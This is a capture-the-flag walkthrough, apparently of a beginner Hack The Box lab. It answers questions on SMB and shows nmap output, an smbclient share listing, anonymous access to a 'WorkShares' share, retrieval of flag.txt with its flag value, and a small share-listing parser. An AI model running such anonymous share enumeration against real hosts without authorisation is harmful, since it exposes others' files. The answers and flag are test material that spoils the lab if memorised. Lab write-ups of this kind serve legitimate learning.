# Task 1

Q:What does the 3-letter acronym SMB stand for?

A:Server Message Block

# Task 2

Q:What port does SMB use to operate at?

A:445

# Task 3

Q:What network communication model does SMB use, architecturally speaking?

A:Client-Server Model

# Task 4

Q:What is the service name for port 445 that came up in our nmap scan?

The question asks for the service name that nmap identified on port 445 after the scan:

```
┌──(root💀kali)-[~]
└─# nmap -sV 10.129.53.193 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-28 19:39 CST
Nmap scan report for 10.129.53.193
Host is up (2.9s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.62 seconds
```


A:microsoft-ds

# Task 5

Q:What is the tool we use to connect to SMB shares from our Linux distribution?

A:smbclient

# Task 6

Q:What is the flag or switch we can use with the SMB tool to list the contents of the share?

A:-L

```
┌──(root💀kali)-[~]
└─# smbclient -L 10.129.53.193
Enter WORKGROUP\root's password: 
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.53.193 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

# Task 7

Q:What is the name of the share we are able to access in the end?

From the listing above we can see four shares under Sharename. The ones ending in `$` are administrative shares that require admin privileges, so the only one we can connect to is WorkShares.

A:WorkShares
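To make the Task 6 and Task 7 reasoning repeatable, here is a small parser (an added example, not part of the original writeup) that reads the `smbclient -L` share table and separates the `$`-suffixed administrative shares from the ones worth trying without admin rights. The sample listing is constructed to match the output above, and the table-format rules (header row, dashed separator, trailer text ending the table) are assumptions about smbclient's output.

```python
import re
from dataclasses import dataclass

# Constructed sample, mirroring the 'smbclient -L 10.129.53.193' output above.
SAMPLE_LISTING = """\
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk      
Reconnecting with SMB1 for workgroup listing.
"""


@dataclass
class Share:
    name: str
    kind: str
    comment: str

    @property
    def administrative(self) -> bool:
        # A trailing '$' marks a hidden share; ADMIN$, C$ and IPC$ are the
        # default administrative shares that need admin rights to open.
        return self.name.endswith("$")


# One table row: indented name, share type, optional comment (assumed format).
ROW = re.compile(r"^\s+(\S+)\s+(Disk|IPC|Printer)\s*(.*)$")


def parse_share_listing(text: str):
    """Return the Share rows found between the header and the trailer text."""
    shares = []
    in_table = False
    for line in text.splitlines():
        if not in_table:
            in_table = line.split() == ["Sharename", "Type", "Comment"]
            continue
        if line.strip().startswith("---"):
            continue  # dashed separator under the header
        m = ROW.match(line)
        if not m:
            break  # first non-row line ends the table (e.g. SMB1 reconnect notice)
        shares.append(Share(m.group(1), m.group(2), m.group(3).strip()))
    return shares


def accessible_candidates(shares):
    """Names of non-administrative shares, i.e. what a low-privilege user may open."""
    return [s.name for s in shares if not s.administrative]
```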

# Task 8

Q:What is the command we can use within the SMB shell to download the files we find?

A:get

# Task 9

Q:Submit root flag

On this one I just fucking GG'd straight away:

```
┌──(root💀kali)-[/etc]
└─# smbclient \\\\10.219.53.193\\WorkShares
do_connect: Connection to 10.219.53.193 failed (Error NT_STATUS_IO_TIMEOUT)
```


It timed out.

I manually reconnected openVPN, and then it connected.

I found that after suspending and restarting the VM, the machine can no longer be pinged, and openVPN has to be restarted manually.

Small detail, noted!

```
┌──(root💀kali)-[~/桌面]
└─# smbclient \\\\10.129.227.16\\WorkShares
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
.                                   D        0  Mon Mar 29 16:22:01 2021
..                                  D        0  Mon Mar 29 16:22:01 2021
Amy.J                               D        0  Mon Mar 29 17:08:24 2021
James.P                             D        0  Thu Jun  3 16:38:03 2021
5114111 blocks of size 4096. 1732182 blocks available
smb: \> cd James.P\
smb: \James.P\> ls
.                                   D        0  Thu Jun  3 16:38:03 2021
..                                  D        0  Thu Jun  3 16:38:03 2021
flag.txt                            A       32  Mon Mar 29 17:26:57 2021
5114111 blocks of size 4096. 1732182 blocks available
smb: \James.P\> get flag.txt 
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
```

The flag:

```
┌──(root💀kali)-[~/桌面]
└─# cat flag.txt
5f61c10dffbc77a704d76016a22f1664
```